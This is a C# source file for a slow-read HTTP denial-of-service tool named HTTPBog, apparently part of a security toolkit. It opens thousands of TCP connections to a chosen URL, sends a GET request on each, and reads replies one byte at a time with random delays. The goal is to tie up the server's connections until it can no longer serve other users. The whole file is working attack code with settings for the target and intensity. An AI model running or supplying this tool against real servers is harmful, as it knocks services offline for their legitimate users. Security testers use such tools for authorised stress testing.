﻿using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading;
using System.Net;
using System.Net.Sockets;
using System.Xml.Serialization;
using AutoSecTools.Components;
using AutoSecTools.Components.IO;
using AutoSecTools.Components.Threading;
using AutoSecTools.Components.Serialization;

namespace HTTPBog
{
    [Serializable]
    public class SlowHttpClient
    {
        private static Random _random = new Random();

        private static XmlSerializer _serializer = new XmlSerializer(typeof(SlowHttpClient));

        private string _host;

        private int _port;

        private string _path;

        private string _url;

        [CommandLineArgument("-Url")]
        public string Url
        {
            get { return _url; }
            set { SetUri(value); }
        }

        [CommandLineArgument("-Timeout")]
        public int Timeout { get; set; }

        [CommandLineArgument("-CreateCount")]
        public int ClientCreateCount { get; set; }

        [CommandLineArgument("-CreateSleep")]
        public int ClientCreateSleep { get; set; }

        [CommandLineArgument("-ClientCount")]
        public int ClientCount { get; set; }

        public bool ReadStream { get; set; }

        [CommandLineArgument("-ReadSleepMin")]
        public int ReadSleepMin { get; set; }

        [CommandLineArgument("-ReadSleepMax")]
        public int ReadSleepMax { get; set; }

        [CommandLineArgument("-Silent")]
        public bool Silent { get; set; }

        [XmlIgnore]
        public List<TcpClient> Clients { get; private set; }

        [XmlIgnore]
        public List<NetworkStream> Streams { get; private set; }

        private int _bytesRead = 0;

        [XmlIgnore]
        public int BytesRead
        {
            get { return _bytesRead; }
        }

        private IPHostEntry _entry = null;

        public SlowHttpClient()
        {
            _host = null;
            _port = 80;
            Timeout = 16000;
            Clients = new List<TcpClient>();
            Streams = new List<NetworkStream>();
            ClientCreateCount = 128;
            ClientCreateSleep = 256;
            ClientCount = 16384;
            ReadSleepMin = 0;
            ReadSleepMax = 10000;
            ReadStream = true;
            _path = "/";
        }

        public string[] ValidateClient()
        {
            var errors = new List<string>();

            if (_host == null)
                errors.Add("No url specified.");

            return errors.ToArray();
        }

        private void SetUri(string Uri)
        {
            _url = Uri;

            var u = new Uri(Uri);

            if (!u.IsAbsoluteUri)
                throw new UriFormatException("Url must be absolute.");

            _host = u.Host;
            _port = u.Port;
            _path = u.PathAndQuery;
        }

        private void SendClientRequest(NetworkStream Stream)
        {
            Stream.WriteString("GET " + _path + " HTTP/1.1\r\n" +
                "Host: " + _host + "\r\n" +
                "\r\n");

            //Stream.ReadByte();
        }

        private TcpClient GetClient()
        {
            var c = new TcpClient()
            {
                SendTimeout = Timeout,
                ReceiveTimeout = Timeout,
            };
            c.Connect(_entry.AddressList[0], _port);
            return c;
        }

        private void CreateClients(object o)
        {
            while (true)
            {
                if (Clients.Count != ClientCount)
                {
                    var c = ClientCount - Clients.Count;

                    c = c > ClientCreateCount ? ClientCreateCount : c;

                    var clients = new List<TcpClient>();
                    var streams = new List<NetworkStream>();


                    Async.ForEach(Enumerable.Range(0, c).ToArray(), x =>
                    {
                        TcpClient client;
                        NetworkStream stream;

                        try
                        {
                            client = GetClient();
                            stream = client.GetStream();
                            SendClientRequest(stream);
                        }
                        catch (System.Exception ex)
                        {
#if VERBOSE
                            Console.WriteLine("\r\n" + ex.Message);
#endif

                            return;
                        }

                        lock (clients)
                        {
                            clients.Add(client);
                            streams.Add(stream);
                        }

#if VERBOSE
                        Console.Write(".");
#endif
                    });

                    lock (Clients)
                    {
                        Clients.AddRange(clients);
                        Streams.AddRange(streams);
                    }
                }

                Thread.Sleep(ClientCreateSleep);
            }
        }

        private void ReadStreams(object o)
        {
            while (true)
            {
                var disconnected = new List<int>();

                for (int i = 0; i < Clients.Count; i++)
                {


                    if (!Clients[i].Connected)
                    {
                        disconnected.Add(i);

                        continue;
                        //Console.WriteLine("Not connected!");
                    }

                    try
                    {
                        if (Streams[i].ReadByte() == -1)
                            disconnected.Add(i);
                        else
                            Interlocked.Increment(ref _bytesRead);

                        //var s = Streams[i];

                        //ThreadPool.QueueUserWorkItem(x => s.ReadByte());

                        //Console.Write("r");
                    }
                    catch (System.Exception ex)
                    {
                        disconnected.Add(i);
#if VERBOSE
                        Console.WriteLine("\r\n" + ex.Message);
#endif
                        //Console.Write("e");
                    }
                }

                //Console.Write("r");

                lock (Clients)
                {
                    foreach (var i in disconnected.OrderByDescending(x => x))
                    {
                        try
                        {
                            Streams[i].Close();
                        }
                        catch { }

                        Clients.RemoveAt(i);
                        Streams.RemoveAt(i);

                        //Console.Write("d");
                    }
                }

                Thread.Sleep(_random.Next(ReadSleepMin, ReadSleepMax));
            }
        }

        public void SlowRead()
        {
            var threads = 5000;

            ThreadPool.SetMaxThreads(threads, threads);
            ThreadPool.SetMinThreads(threads, threads);

            _entry = Dns.GetHostEntry(_host);

            ThreadPool.QueueUserWorkItem(CreateClients);
            //ThreadPool.QueueUserWorkItem(DisplayStats);

            if (ReadStream)
                ThreadPool.QueueUserWorkItem(ReadStreams);
        }

        public void Save(string Filename)
        {
            _serializer.Serialize(Filename, this);
        }

        public static SlowHttpClient Load(string Filename)
        {
            return _serializer.Deserialize(Filename) as SlowHttpClient;
        }
    }

}
